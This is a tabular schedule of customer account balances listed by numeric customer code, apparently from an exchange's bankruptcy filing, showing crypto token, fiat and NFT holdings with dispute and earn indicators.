| 07362086 | | USD[10.00] | | |
| 07362087 | | BTC[.00071497], NFT (299067641787380131/Romeo #779)[1], NFT (527466644415528027/Entrance Voucher #2886)[1], USD[0.00] | | |
| 07362088 | | DOGE[3338.8], ETH[.18886], ETHW[.18886], SOL[3.0988], USD[1533.47] | | |
| 07362089 | | USD[10.00] | | |
| 07362090 | | BAT[1.01655549], BRZ[2], DAI[.00000001], DOGE[3.000548], ETH[0], ETHW[0.53964745], GRT[1.00367791], SUSHI[1.10827326], USD[11.89], USDT[0.00000001] | Yes | |
| 07362091 | | USD[10.00] | | |
| 07362092 | | USD[10.00] | | |
| 07362093 | | CUSDT[6], TRX[1], USD[0.01] | | |
| 07362094 | | CUSDT[1], DOGE[1], USD[0.00] | Yes | |
| 07362095 | | USD[10.00] | | |
| 07362096 | | BRZ[1], CUSDT[6], DOGE[0], ETH[0], TRX[2], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07362097 | | ETH[.00549726], ETHW[.00549726], USD[0.00] | | |
| 07362098 | | USD[10.00] | | |
| 07362099 | | USD[10.00] | | |
| 07362101 | | USD[10.00] | | |
| 07362103 | | CUSDT[1], DOGE[13358.167469], SOL[.02539348], USD[0.00] | | |
| 07362104 | | BAT[13.45487951], CUSDT[2.17803941], DOGE[82.00766565], MATIC[4.55354105], TRX[467.09830885], USD[0.00] | | |
| 07362105 | | USD[10.00] | | |
| 07362106 | | USD[10.00] | | |
| 07362107 | | CUSDT[1], DOGE[11783.49064235], USD[0.00] | | |
| 07362108 | | DOGE[138.62771043], TRX[1], USD[0.00] | | |
| 07362109 | | CUSDT[1], DOGE[13321.33539415], LTC[1.60959644], USD[0.00], USDT[1] | | |
| 07362110 | | USD[10.00] | | |
| 07362111 | | BTC[0], DOGE[0], ETH[0], SOL[0], USD[0.00] | | |
| 07362112 | | BTC[.00010651], DOGE[90.43118508], ETH[.0027213], ETHW[.0027213], USD[0.27] | | |
| 07362114 | | DOGE[1.00002652], TRX[1], USD[0.00] | | |
| 07362115 | | DOGE[132.4989082], USD[0.00] | | |
| 07362116 | | USD[10.00] | | |
| 07362117 | | TRX[98.21837756], USD[0.00] | | |
| 07362118 | | DOGE[18.57532967], USD[2.50] | | |
| 07362119 | | CUSDT[1], DOGE[11013.67717186], TRX[1], USD[0.00] | | |
| 07362121 | | USD[10.00] | | |
| 07362122 | | CUSDT[2], DOGE[1], ETH[0], EUR[0.00], TRX[2], USD[0.00], USDT[0.00000001] | Yes | |
| 07362125 | | USD[10.00] | | |
| 07362126 | | BRZ[2], CUSDT[2], DOGE[2835.15109507], SHIB[1552419.7614873], TRX[3], USD[0.00] | | |
| 07362127 | | USD[10.96] | Yes | |
| 07362128 | | DOGE[181.12743385], TRX[1], USD[0.00] | | |
| 07362129 | | USD[10.00] | | |
| 07362130 | | USD[10.00] | | |
| 07362131 | | USD[10.00] | | |
| 07362132 | | USD[0.00] | | |
| 07362133 | | LINK[.37190367], USD[0.00] | | |
| 07362134 | | USD[10.00] | | |
| 07362135 | | USD[10.00] | | |
| 07362137 | | BRZ[0], CUSDT[53.19757992], DOGE[179.9974322], NFT (458416870356968087/Entrance Voucher #2253)[1], TRX[3997.98607935], USD[3.12], USDT[1.10233792] | Yes | |
| 07362138 | | USD[10.00] | | |
| 07362139 | | DAI[.00000001], SOL[0] | | |
| 07362140 | | USD[10.00] | | |
| 07362141 | | USD[10.00] | | |
| 07362142 | | USD[10.00] | | |
| 07362143 | | USD[10.00] | | |
| 07362144 | | CUSDT[1], DOGE[2], SOL[14.22067758], TRX[325.20021127], USD[0.00] | | |
| 07362145 | | USD[10.00] | | |
| 07362146 | | USD[10.00] | | |
| 07362147 | | BTC[0], DOGE[2], TRX[1], USD[0.00] | | |
| 07362148 | | DOGE[1], USD[0.00], USDT[0] | | |
| 07362149 | | BAT[1], CUSDT[1], DOGE[.0000388], ETH[.01384601], ETHW[.01384601], SHIB[258297.81738344], USD[0.00] | | |
| 07362150 | | BTC[.00020298], CUSDT[1], USD[0.00] | Yes | |
| 07362151 | | DOGE[127.93858947], USD[10.00] | | |
| 07362152 | | BTC[.00646555], CUSDT[7], ETH[.07859379], ETHW[.07761975], SOL[1.91235747], TRX[1], USD[1.79] | Yes | |
| 07362153 | | BRZ[1], CUSDT[4], DOGE[125.74858888], TRX[.00003462], USD[0.59] | | |
| 07362154 | | BAT[1], CUSDT[2], USD[0.01] | | |
| 07362156 | | BRZ[1], CUSDT[3], DOGE[2913.93527333], TRX[1], USD[0.00] | Yes | |
| 07362157 | | USD[10.31] | Yes | |
| 07362158 | | USD[10.00] | | |
| 07362159 | | USD[10.00] | | |
| 07362160 | | USD[10.00] | | |
| 07362161 | | BF_POINT[200], DOGE[30.53113758], USD[0.00] | Yes | |
| 07362162 | | CUSDT[4], DOGE[3.6131807], SHIB[681966.38025904], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07362163 | | USD[10.00] | | |
| 07362164 | | CUSDT[12], DOGE[276.02403711], NFT (415578874065579137/Marcus Allen's Playbook: Seattle Seahawks vs. Los Angeles Raiders - October 7, 1984 #87)[1], NFT (549535193234135233/Marcus Allen's Playbook: Los Angeles Raiders vs. Washington - January 22, 1984 #101)[1], TRX[1029.30040036], USD[0.00], USDT[0] | Yes | |
| 07362165 | | USD[10.00] | | |
| 07362166 | | CUSDT[1], DOGE[.00001807], TRX[1], USD[0.00] | | |
| 07362167 | | USD[0.02], USDT[244.755] | | |
| 07362168 | | CUSDT[1], DOGE[1032.80514599], USD[0.02] | | |
| 07362169 | | BRZ[1], BTC[0], CUSDT[3], DOGE[0], TRX[1], USD[0.00] | | |
| 07362170 | | DOGE[177.73107447], USD[0.01] | | |
| 07362171 | | BF_POINT[300], BRZ[1], CUSDT[4], SHIB[1], TRX[3], USD[193.73], USDT[1.07997391] | Yes | |
| 07362172 | | BRZ[1], BTC[.00013427], DOGE[1], TRX[2], USD[0.09] | | |
| 07362173 | | BTC[0], CUSDT[5], DOGE[41.98968529], ETH[0], GRT[3.10051783], LINK[0], SHIB[1], SOL[0], SUSHI[0], TRX[5], USD[8396.37], USDT[0], YFI[0] | Yes | |
| 07362174 | | TRX[1], USD[0.00] | | |
| 07362177 | | AAVE[0], AVAX[0], BTC[1.40770000], DAI[.00000001], ETH[0], ETHW[0.00089263], GRT[0], LINK[0], LTC[0], MATIC[0], PAXG[0.00007023], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.61], USDT[0.00000001], WBTC[0.00005000], YFI[0] | | |
| 07362178 | | TRX[201.86315073], USD[0.00] | Yes | |
| 07362179 | | USD[0.00] | | |
| 07362180 | | BTC[0], UNI[0] | | |
| 07362182 | | USD[10.00] | | |
| 07362183 | | BRZ[2], CUSDT[2], DOGE[8], TRX[1], USD[0.00], USDT[1] | | |
| 07362184 | | CUSDT[2], DOGE[792.91185577], USD[0.00] | | |
| 07362185 | | USD[10.00] | | |
| 07362186 | | BRZ[.0002694], BTC[.00000001], CUSDT[5], DOGE[1.67775612], ETH[.00000015], ETHW[.0000015], GRT[.00066249], SOL[.00001085], TRX[1.51628495], USD[0.55] | Yes | |
| 07362187 | | BRZ[2], USD[0.00] | | |
| 07362188 | | BRZ[1], CUSDT[1], USD[0.01] | | |
| 07362189 | | DOGE[1], USD[0.00] | | |
| 07362190 | | CUSDT[1], DOGE[2], SOL[36.36430493], SUSHI[.6694333], TRX[1], USD[0.00] | | |
| 07362191 | | CUSDT[3], DOGE[1.1635375], NFT (555255938217218870/Miami Ticket Stub #452)[1], TRX[1], USD[0.00] | Yes | |
| 07362192 | | USD[10.00] | | |
| 07362195 | | USD[10.00] | | |
| 07362196 | | USD[10.00] | | |
| 07362197 | | BRZ[1], BTC[.0062018], CUSDT[1], DOGE[1.0000197], TRX[2], USD[420.06] | | |
| 07362198 | | BF_POINT[300], USD[0.00] | Yes | |
| 07362199 | | USD[10.00] | | |
| 07362200 | | USD[10.00] | | |
| 07362202 | | USD[0.00] | | |
| 07362203 | | USD[0.00] | | |
| 07362205 | | USD[0.00] | | |
| 07362206 | | USD[10.00] | | |
| 07362207 | | USD[10.00] | | |
| 07362208 | | DOGE[19794.68750015], TRX[2], USD[0.01], USDT[1] | | |
| 07362209 | | USD[10.00] | | |
| 07362210 | | USD[10.00] | | |
| 07362212 | | USD[10.00] | | |
| 07362213 | | BTC[0], DOGE[0], ETH[0], GRT[0], USD[0.01] | | |
| 07362214 | | NFT (378523256844337222/FTX - Off The Grid Miami #701)[1], NFT (554639947622467485/Barcelona Ticket Stub #2220)[1] | Yes | |
| 07362215 | | USD[10.00] | | |
| 07362216 | | USD[10.00] | | |
| 07362217 | | DOGE[1.38461614], USD[2.21], USDT[0] | | |
| 07362218 | Contingent, Disputed | DOGE[2.06293668], ETH[0], TRX[1], USD[0.00] | | |
| 07362219 | | BF_POINT[300], DOGE[13713.67414559], NFT (365661599860119530/Entrance Voucher #3491)[1], USD[0.00] | Yes | |
| 07362220 | | CUSDT[2], DOGE[1], ETH[0], TRX[1], USD[0.00] | | |
| 07362221 | | USD[10.00] | | |
| 07362222 | | BTC[0], DOGE[1], SOL[.45563026], USD[0.00] | | |
| 07362224 | | CUSDT[9], DOGE[1], TRX[6563.50667253], USD[0.00] | Yes | |
| 07362225 | | CUSDT[4], DOGE[21.25952152], USD[0.00], YFI[.00004981] | | |
| 07362226 | | DOGE[15622.77800828], LTC[.05237025], USD[0.00] | | |
| 07362227 | | BTC[.00018295], USD[0.00] | | |
| 07362229 | | USD[0.01], USDT[0.99391067] | | |
| 07362230 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07362233 | | BRZ[1], BTC[.00001773], CUSDT[1], SOL[0], SUSHI[0], TRX[2], USD[50.87], USDT[0], YFI[0] | | |
| 07362234 | | USD[10.00] | | |
| 07362235 | | BTC[.00163979], SHIB[1], TRX[1], USD[0.00] | Yes | |
| 07362237 | | BRZ[2], BTC[0.00000086], DOGE[3], ETH[0], GRT[1], LINK[0], NFT (30352538721039817 0/CloudNFT Series 1 #8)[1], NFT (316300398941897576/CloudNFT Series 1 #29)[1], NFT (389124846913965500/CloudNFT Series 1 #24)[1], NFT (397788509341447872/CloudNFT Series 1 #23)[1], NFT (419899569041383024/CloudNFT Series 1 #28)[1], NFT (445159334961050845/CloudNFT Series 1 #7)[1], NFT (458431502697275785/CloudNFT Series 1 #30)[1], NFT (467837974287423863/CloudNFT Series 1 #3)[1], NFT (470314490910917925/CloudNFT Series 1 #20)[1], NFT (554739707371604998/CloudNFT Series 1 #26)[1], NFT (569441129026903257/CloudNFT Series 1 #19)[1], PAXG[0], SHIB[9], SOL[0], USD[1.35], USDT[0.00001226], YFI[0] | Yes | |
| 07362239 | | BAT[18.57208557], USD[0.00] | | |
| 07362240 | | ETH[.00043673], ETHW[.00043673], LINK[0], USD[0.07] | | |
| 07362241 | | CUSDT[1], DOGE[.0492905], USD[0.00] | | |
| 07362243 | | USD[0.00] | | |
| 07362244 | | USD[10.00] | | |
| 07362246 | | TRX[1], USD[0.00] | Yes | |
| 07362247 | | USD[10.00] | | |
| 07362248 | | USD[10.00] | | |
| 07362249 | | USD[10.00] | | |
| 07362251 | | BTC[.01031288], USD[10.86] | Yes | |
| 07362252 | | USD[10.00] | | |
| 07362253 | | BTC[0], DOGE[0], ETH[0], TRX[1.45288294], USD[0.00], USDT[0] | | |
| 07362254 | | USD[0.05] | | |
| 07362255 | | USD[0.00] | Yes | |
| 07362257 | | USD[10.00] | | |
| 07362258 | | USD[10.00] | | |
| 07362259 | | CUSDT[3], DOGE[10413.84540309], TRX[1], USD[0.00] | | |
| 07362260 | | BRZ[1], CUSDT[1], DOGE[657.89008043], GRT[175.32153927], NFT (396304486352242748/Neon Iguana Lizard)[1], NFT (458750981157359942/Fire Iguana Lizard)[1], SHIB[721445.22362080], SUSHI[15.76787903], USD[0.00] | Yes | |
| 07362261 | | USD[10.00] | | |
| 07362262 | | DOGE[163.97437358], USD[0.00] | | |
| 07362263 | | ETH[.00513021], ETHW[.00513021], USD[0.00] | | |
| 07362266 | | DOGE[134.59151273], USD[0.00] | | |
| 07362267 | | USD[10.00] | | |
| 07362268 | | CUSDT[2], DOGE[5], USD[0.01] | | |
| 07362269 | | DOGE[1], TRX[1], USD[0.00], YFI[.00026714] | | |
| 07362270 | | CUSDT[8], DOGE[2], TRX[3], USD[0.00] | | |
| 07362271 | | CUSDT[1], USD[0.00] | Yes | |
| 07362272 | | USD[0.00] | | |
| 07362273 | | USD[10.00] | | |
| 07362274 | | USD[10.00] | | |
| 07362275 | | DOGE[19.70353315], USD[0.00] | | |
| 07362276 | | DOGE[1.04699557], USD[47.67] | | |
| 07362277 | | USD[10.00] | | |
| 07362278 | | USD[10.00] | | |
| 07362280 | | USD[10.00] | | |
| 07362282 | | USD[10.00] | | |
| 07362283 | | BTC[0], NFT (569476528387326135/Saudi Arabia Ticket Stub #2018)[1], SOL[0], USD[0.00] | | |
| 07362284 | | USD[10.00] | | |
| 07362285 | | USD[10.00] | | |
| 07362286 | | USD[10.00] | | |
| 07362287 | | USD[10.00] | | |
| 07362289 | | USD[10.00] | | |
| 07362290 | | BTC[0], USD[3.60], USDT[0] | | |
| 07362291 | | BTC[.00000118], TRX[1], USD[0.01] | | |
| 07362292 | | BRZ[0], SOL[554.42287382], USD[0.53], USDT[0.00000001] | Yes | |
| 07362293 | | USD[0.00] | | |
| 07362294 | | CUSDT[1], DOGE[0.03151361], ETH[.01465329], ETHW[.01447545], TRX[2], USD[0.00] | Yes | |
| 07362295 | | SOL[1.02960564], USD[0.00] | | |
| 07362296 | | DOGE[34.55759386], NFT (540221289834649091/Entrance Voucher #2100)[1], USD[0.00] | Yes | |
| 07362297 | | BTC[0.01630753], DOGE[1.979], ETH[0], LTC[.76656], SOL[0], TRX[.608], USD[0.24], USDT[0] | | |
| 07362298 | | DOGE[1], ETH[.00347897], ETHW[.00347897], USD[0.00] | | |
| 07362299 | | BRZ[0], CUSDT[1], ETH[0.00000001], GBP[0.00], GRT[1], SUSHI[0], TRX[1], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07362300 | | USD[10.00] | | |
| 07362301 | | BRZ[0], CUSDT[1], ETH[0], EUR[0.00], LINK[0], SGD[0.00], TRX[2], USD[0.01] | | |
| 07362302 | | USD[10.00] | | |
| 07362303 | | DOGE[1.59618161], USD[0.01] | | |
| 07362304 | | CUSDT[5129.9393293], DOGE[3491.42935612], SHIB[50300060.59026611], TRX[4448.62456919], USD[0.20] | Yes | |
| 07362305 | | DOGE[30.58815828], USD[0.00] | | |
| 07362306 | | DOGE[.00006478], ETH[0], ETHW[0.00000911], MATIC[.00194979], NFT (37702318651197523/SOLYETIS #7965)[1], SHIB[2], SOL[0.00028450], UNI[1.00173668], USD[0.01], USDT[1] | | |
| 07362307 | | USD[0.01] | | |
| 07362308 | | USD[10.00] | | |
| 07362309 | | BRZ[1], GRT[107.3806316], USD[10.00] | | |
| 07362310 | | USD[10.00] | | |
| 07362311 | | CUSDT[1], GRT[4.94669511], TRX[1], USD[0.00] | Yes | |
| 07362312 | | BTC[0], DOGE[0], ETH[0], SOL[0], SUSHI[0], USD[0.00], USDT[0.00000001] | | |
| 07362313 | | USD[10.00] | | |
| 07362314 | | USD[10.00] | | |
| 07362315 | | USD[10.00] | | |
| 07362316 | | DOGE[.00004606], ETH[0], NFT (535308556551778032/FTX - Off The Grid Miami #664)[1], USD[0.00] | | |
| 07362317 | | LTC[0], USD[10.00] | | |
| 07362318 | | ETH[.03055], ETHW[.03055], NFT (554058923367873899/Shannon Sharpe's Playbook: Baltimore Ravens vs. Oakland Raiders - January 14, 2001 #38)[1], SOL[9.08354], UNI[7.7], USD[2.46] | | |
| 07362319 | | USD[10.82] | Yes | |
| 07362320 | | USD[10.00] | | |
| 07362321 | | USD[10.00] | | |
| 07362322 | | USD[10.00] | | |
| 07362323 | | USD[10.00] | | |
| 07362324 | | USD[10.00] | | |
| 07362325 | | BRZ[3], DOGE[10], SHIB[1], TRX[5], USD[0.01] | | |
| 07362326 | | USD[10.00] | | |
| 07362327 | | SUSHI[.66925386], USD[0.00] | | |
| 07362328 | | USD[25000.20] | | |
| 07362330 | | USD[10.00] | | |
| 07362331 | | USD[10.00] | | |
| 07362332 | | CUSDT[1], DOGE[36.80985910], USD[0.00] | | |
| 07362333 | | USD[10.00] | | |
| 07362334 | | USD[10.00] | | |
| 07362336 | | BTC[0.10770494], CUSDT[0], DOGE[29209.85971837], ETH[1.04034334], ETHW[1.03990633], LINK[231.30842327], MATIC[0], SHIB[1], SOL[0], USD[0.00] | Yes | |
| 07362337 | | USD[10.00] | | |
| 07362338 | | USD[0.00] | | |
| 07362339 | | DOGE[2819.172], ETH[.029919], ETHW[.029919], SOL[16.956], USD[0.01], USDT[161.082572] | | |
| 07362340 | | DOGE[1], USD[0.00] | | |
| 07362341 | | BRZ[1.00131256], CUSDT[6], DOGE[1], TRX[4], USD[0.00] | | |
| 07362342 | | BTC[0.00140784], CUSDT[1], TRX[1], USD[0.00] | | |
| 07362344 | | USD[10.00], USDT[9.94407343] | | |
| 07362345 | | USD[10.00] | | |
| 07362346 | | USD[0.00], USDT[0] | | |
| 07362347 | | USD[10.00] | | |
| 07362348 | | CUSDT[1], LTC[.05691219], SUSHI[3.78744403], TRX[1], USD[0.00] | | |
| 07362349 | | USD[10.00] | | |
| 07362350 | | BAT[1], CUSDT[3], DOGE[17290.17653742], TRX[7], USD[0.00], USDT[0] | | |
| 07362351 | | BRZ[1], CUSDT[1], SOL[.63817389], USD[0.00] | | |
| 07362352 | | BAT[.00007049], BRZ[0.47640510], CAD[2.26], CUSDT[2.68685634], DAI[.94829918], DOGE[1.00000665], EUR[1.01], GRT[.00002708], SOL[.00006843], TRX[2.5490663], UNI[.00001554], USD[0.51], USDT[1.94109297] | | |
| 07362353 | | ETH[.25], ETHW[.25], USD[10.00] | | |
| 07362354 | | USD[10.00] | | |
| 07362355 | | USD[10.00] | | |
| 07362356 | | BAT[1], BRZ[1], CUSDT[6], DOGE[825.37435421], TRX[2], USD[0.20], USDT[0.00002135] | | |
| 07362357 | | BAT[0], BCH[0], BRZ[0], BTC[0], DOGE[0], SOL[0], USD[0.01], USDT[0], YFI[0] | Yes | |
| 07362358 | | USD[10.00] | | |
| 07362359 | | USD[10.00] | | |
| 07362360 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07362362 | | USD[0.00] | | |
| 07362363 | | USD[8.57] | | |
| 07362364 | | BTC[.00020627], USD[0.00] | | |
| 07362365 | | CUSDT[1], USD[0.00] | | |
| 07362366 | | USD[10.00] | | |
| 07362367 | | USD[10.00] | | |
| 07362368 | | BTC[0], DOGE[0], GRT[0], SHIB[1], SOL[0], USD[0.00] | | |
| 07362371 | | USD[10.00] | | |
| 07362372 | | BAT[1.0165555], BRZ[1], CUSDT[2631.5228854], DOGE[4169.54747737], GRT[40.88914595], TRX[1], USD[17.90] | Yes | |
| 07362373 | | DOGE[4], USD[0.00], USDT[0] | | |
| 07362374 | | USD[0.00], YFI[.00023204] | | |
| 07362375 | | USD[10.00] | | |
| 07362376 | | USD[0.01], USDT[0] | | |
| 07362377 | | ETH[.01259505], ETHW[.01259505], USD[10.00] | | |
| 07362378 | | USD[10.00] | | |
| 07362379 | | USD[2.12] | | |
| 07362380 | | USD[10.00] | | |
| 07362382 | | BTC[0.01274328], CUSDT[7], DOGE[2], LINK[3.34245183], TRX[3], USD[0.02], USDT[1] | | |
| 07362383 | | CUSDT[5], DOGE[.00001732], ETH[0.05038146], ETHW[0.04975371], TRX[3], USD[0.01] | Yes | |
| 07362384 | | BRZ[1], CUSDT[6], DOGE[167.76116702], SHIB[1], SOL[.2562327], TRX[2], USD[0.01] | Yes | |
| 07362385 | | BTC[.00145272], DOGE[903.74369137], TRX[9102.04960484], USD[0.00] | Yes | |
| 07362386 | | USD[10.00] | | |
| 07362387 | | BAT[3.39305587], BCH[.01033357], DAI[.98970503], DOGE[1], EUR[1.08], SOL[1.08053597], SUSHI[1.07500271], USD[65.08], USDT[.99368548] | Yes | |
| 07362390 | | USD[10.00] | | |
| 07362391 | | CUSDT[1], USD[0.00] | Yes | |
| 07362392 | | BRZ[2], CUSDT[2], TRX[2], USD[0.00] | | |
| 07362393 | | ETH[.00040398], ETHW[0.20140398], USD[0.00] | | |
| 07362394 | | MATIC[6.15288761], USD[0.00] | Yes | |
| 07362395 | | USD[29.99] | | |
| 07362396 | | BRZ[1.61126403], CUSDT[2], USD[0.00], USDT[0] | | |
| 07362398 | | USD[10.00] | | |
| 07362399 | | USD[10.00] | | |
| 07362400 | | ETH[0], USD[0.00], USDT[2.1134062] | | |
| 07362401 | | BTC[0], MATIC[-25.68002201], USD[46.08] | | |
| 07362402 | | USD[10.00] | | |
| 07362403 | | BTC[0], ETH[.00000005], ETHW[0.20909569], LINK[30.33215586], MATIC[2.00000584], SOL[0], USD[0.00] | | |
| 07362404 | | USD[0.00] | | |
| 07362406 | | DOGE[1], USD[0.00] | | |
| 07362407 | | USD[10.00] | | |
| 07362408 | | USD[10.00] | | |
| 07362409 | | TRX[1.42304714], USD[0.00] | | |
| 07362411 | | SOL[.824220051], USD[0.00] | Yes | |
| 07362412 | | USD[10.00] | | |
| 07362414 | | CUSDT[1], DOGE[1], TRX[1], USD[25.14] | | |
| 07362415 | | USD[10.00] | | |
| 07362416 | | USD[0.04] | Yes | |
| 07362417 | | DOGE[1], TRX[1], USD[0.00] | | |
| 07362418 | | CUSDT[2], DOGE[101.36581897], USD[0.10] | | |
| 07362419 | | ETH[0], SUSHI[0], USD[0.00] | Yes | |
| 07362421 | | BAT[1], BF_POINT[100], BRZ[3], DOGE[3], ETHW[.19692602], NFT (345347996846018592/2D SOLDIER #3936)[1], SHIB[4], TRX[1], USD[311.45], USDT[0.00000001] | Yes | |
| 07362422 | | DOGE[.00003928], USD[0.01] | | |
| 07362423 | | BTC[0], CUSDT[3], DOGE[1], USD[0.00], USDT[0] | Yes | |
| 07362424 | | TRX[1], USD[10.00] | | |
| 07362425 | | DOGE[49.75383131], USD[1.18] | | |
| 07362426 | | USD[10.00] | | |
| 07362427 | | BTC[0], CUSDT[2], DOGE[0], GBP[0.00], GRT[0], NFT (337235130243732300/DOTB #1473)[1], NFT (342444753543106395/ApexDucks #4047)[1], NFT (484281665543929658/DOTB #5006)[1], NFT (525226299733234416/Imola Ticket Stub #870)[1], NFT (572802508247280954/Barcelona Ticket Stub #1831)[1], SHIB[1], SOL[.03280023], TRX[0], USD[0.00] | Yes | |
| 07362428 | | USD[10.00] | | |
| 07362429 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07362430 | | BTC[.00021224], USD[0.00] | | |
| 07362431 | | BAT[1.00863836], BRZ[5.07738984], CUSDT[13412.59377486], DOGE[22657.62244185], GRT[1.00406039], SHIB[121849854.6365389], SOL[46.65623837], SUSHI[.00000463], TRX[5803.04028231], USD[0.19], USDT[1.08289418] | Yes | |
| 07362432 | | DOGE[102.28959381], ETH[.00579989], ETHW[.00579989], USD[0.00] | | |
| 07362433 | | BRZ[2], BTC[0.00017966], CUSDT[3], DOGE[3], ETH[0], GRT[0], TRX[4], USD[0.00], USDT[0.00000001] | | |
| 07362434 | | SOL[.09937222], USD[0.00] | Yes | |
| 07362435 | | BTC[0], SOL[0], USD[0.00], USDT[0] | | |
| 07362436 | | USD[10.00] | | |
| 07362437 | | USD[10.00] | | |
| 07362438 | | NFT (316567785500145426/Entrance Voucher #3257)[1], TRX[207.3962185], USD[0.00] | Yes | |
| 07362439 | | BAT[2.08106299], CUSDT[2], DOGE[2], SOL[43.91874659], SUSHI[1.09568922], TRX[1], USD[0.08] | Yes | |
| 07362440 | | USD[10.00] | | |
| 07362442 | | CUSDT[1], DOGE[933.45092325], USD[0.00] | | |
| 07362443 | | USD[10.00] | | |
| 07362445 | | BTC[0], ETH[0], ETHW[0], TRX[.010734], USD[0.00], USDT[0.00000001] | | |
| 07362447 | | USD[10.00] | | |
| 07362448 | | CUSDT[1], DOGE[1601.17275073], TRX[2], USD[0.01] | | |
| 07362449 | | DOGE[36.70181893], USD[0.00] | | |
| 07362450 | | DOGE[0], ETH[0] | | |
| 07362451 | Contingent, Disputed | USD[0.00] | | |
| 07362452 | | TRX[1], USD[0.00] | Yes | |
| 07362454 | | USD[0.00] | | |
| 07362455 | | BCH[1.24789994], CUSDT[1], DOGE[8702.93806482], USD[0.00] | Yes | |
| 07362456 | | USD[10.00] | | |
| 07362457 | | USD[10.00] | | |
| 07362458 | | USD[1.00], USDT[0] | | |
| 07362459 | | DOGE[2], USD[0.01] | | |
| 07362460 | | ETHW[.000783], SOL[.00000001], USD[0.01] | | |
| 07362461 | | USD[0.00] | | |
| 07362462 | | BAT[171.74085338], BRZ[202.90417], CUSDT[4673.01725558], DOGE[12592.82157676], ETH[.047623], ETHW[.047623], KSHIB[775.26844057], SHIB[3035363.98045424], SUSHI[4.34557727], TRX[1190.17770729], USD[50.00] | | |
| 07362463 | | LINK[.36094507], USD[0.00] | | |
| 07362464 | | USD[10.00] | | |
| 07362465 | | USD[10.00] | | |
| 07362466 | | USD[10.00] | | |
| 07362467 | | SOL[0] | | |
| 07362468 | | BCH[.00808398], BTC[.0000882], DOGE[61.33231701], ETH[.00066972], ETHW[.00066972], USD[6.00] | | |
| 07362470 | | CUSDT[1], DOGE[50.97467282], USD[0.01] | | |
| 07362471 | | USD[10.00] | | |
| 07362472 | | USD[0.02] | | |
| 07362473 | | USD[10.00] | | |
| 07362474 | | BTC[.00285054], DOGE[1], USD[10.00] | | |
| 07362475 | Contingent, Disputed | USD[0.00], USDT[0] | | |
| 07362476 | | USD[10.00] | | |
| 07362477 | | USD[0.00] | | |
| 07362478 | | DOGE[141.79718861], USD[0.00] | | |
| 07362479 | | CUSDT[1], USD[13.06] | Yes | |
| 07362480 | | BRZ[2], CUSDT[4], TRX[4], USD[0.00] | | |
| 07362481 | | USD[10.00] | | |
| 07362482 | | NFT (317334749419386654/Golden Hill #425)[1], NFT (368015308880027161/Night Light #673)[1], NFT (388134597009728295/Night Light #911)[1], NFT (403411082632234066/Vintage Sahara #925)[1], NFT (450569625310812635/Cosmic Creations #222)[1], NFT (458782867969070125/Sun Set #340)[1], NFT (466348865006090421/Night Light #357)[1], NFT (473636390734265919/Beasts #572)[1], NFT (497903428937081060/Spectra #783)[1], NFT (498549853919444988/Reflector #593)[1], NFT (512692623997033080/Colossal Cacti #283)[1], NFT (518254405232241820/Cosmic Creations #864)[1], NFT (553447344900339682/Ferris From Afar #789)[1], USD[1.29] | | |
| 07362483 | | BTC[.00000001], USD[0.00], USDT[0] | | |
| 07362485 | | BTC[0], USD[0.00], USDT[0.00046349] | | |
| 07362488 | | CUSDT[2.00002954], TRX[116.27330615], USD[0.00] | | |
| 07362489 | | USD[10.00] | | |
| 07362490 | | DOGE[125.14286622], USD[0.02] | | |
| 07362491 | | USD[10.00] | | |
| 07362493 | | BRZ[1], CUSDT[6], SHIB[1], TRX[2], USD[0.01] | Yes | |
| 07362495 | | DOGE[0], USD[0.07] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07362497 | | CUSDT[1], DOGE[262.29663753], SOL[2.92758047], USD[0.00] | | |
| 07362498 | | DOGE[24.41169761], TRX[1], USD[0.01], USDT[0] | | |
| 07362499 | | ETH[0], TRX[0], USD[0.00], USDT[0.00003048] | | |
| 07362500 | | USD[10.00] | | |
| 07362501 | | ETH[.00557056], ETHW[.00557056], USD[0.00] | | |
| 07362502 | | USD[26.53] | | |
| 07362503 | | BAT[2], CUSDT[1], LINK[1], TRX[4], USD[0.01] | | |
| 07362504 | | DOGE[181.64809956], SHIB[286.07018607], USD[0.00] | Yes | |
| 07362505 | | USD[10.00] | | |
| 07362506 | | USD[10.00] | | |
| 07362508 | | BF_POINT[300], BRZ[10.85806953], CUSDT[5.01512139], DOGE[2386.68257892], GRT[1824.35172942], LINK[.00002331], MATIC[.00406532], SHIB[57352045.53205889], SOL[42.26514692], SUSHI[.00994813], UNI[.00041508], USD[0.00], USDT[0] | Yes | |
| 07362509 | | USD[10.00] | | |
| 07362510 | | BRZ[1], SHIB[1304.99089974], USD[0.01], USDT[1] | | |
| 07362511 | | BAT[15.89768399], CUSDT[2], USD[0.00] | | |
| 07362512 | | BRZ[1], USD[51.07] | | |
| 07362513 | | USD[10.00] | | |
| 07362514 | | BRZ[1], DOGE[1079.55320331], TRX[1], USD[0.01] | | |
| 07362515 | | USD[10.00] | | |
| 07362518 | | BAT[1], BCH[0], BRZ[3], CUSDT[0], DOGE[2784.19676071], SHIB[0], TRX[0], USD[0.00] | | |
| 07362519 | | USD[10.00] | | |
